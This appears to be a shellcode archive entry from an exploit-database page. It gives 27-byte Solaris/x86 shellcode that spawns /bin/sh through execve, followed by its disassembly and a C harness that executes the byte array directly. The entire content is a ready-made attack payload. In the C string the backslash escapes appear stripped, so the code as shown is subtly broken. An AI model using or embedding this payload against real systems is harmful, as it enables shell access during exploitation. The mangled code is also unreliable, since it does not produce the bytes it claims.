Solaris/x86 - execve("/bin/sh","/bin/sh",NULL)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
# Published : 2010-05-20
# Author : Jonathan Salwan
# Previous Title : Solaris/x86 - Reboot() - 37 bytes
# Next Title : Solaris/x86 - Halt shellcode - 36 bytes

/*
Title: 	 Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
Author:  Jonathan Salwan <submit AT shell-storm.org>
Web:	 http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm 

Date:	 2010-05-19
Tested:  SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris

section .text
    0x8048074:              31 c0              xorl   %eax,%eax
    0x8048076:              50                 pushl  %eax
    0x8048077:              68 6e 2f 73 68     pushl  $0x68732f6e
    0x804807c:              68 2f 2f 62 69     pushl  $0x69622f2f
    0x8048081:              89 e3              movl   %esp,%ebx
    0x8048083:              50                 pushl  %eax
    0x8048084:              53                 pushl  %ebx
    0x8048085:              89 e2              movl   %esp,%edx
    0x8048087:              50                 pushl  %eax
    0x8048088:              52                 pushl  %edx
    0x8048089:              53                 pushl  %ebx
    0x804808a:              b0 3b              movb   $0x3b,%al
    0x804808c:              50                 pushl  %eax
    0x804808d:              cd 91              int    $0x91

*/


#include <stdio.h>

char sc[] = "x31xc0x50x68x6ex2f"
	    "x73x68x68x2fx2fx62"
	    "x69x89xe3x50x53x89"
	    "xe2x50x52x53xb0x3b"
	    "x50xcdx91";

int main(void)
{
       	fprintf(stdout,"Length: %dn",strlen(sc));
	(*(void(*)()) sc)();

return 0;
}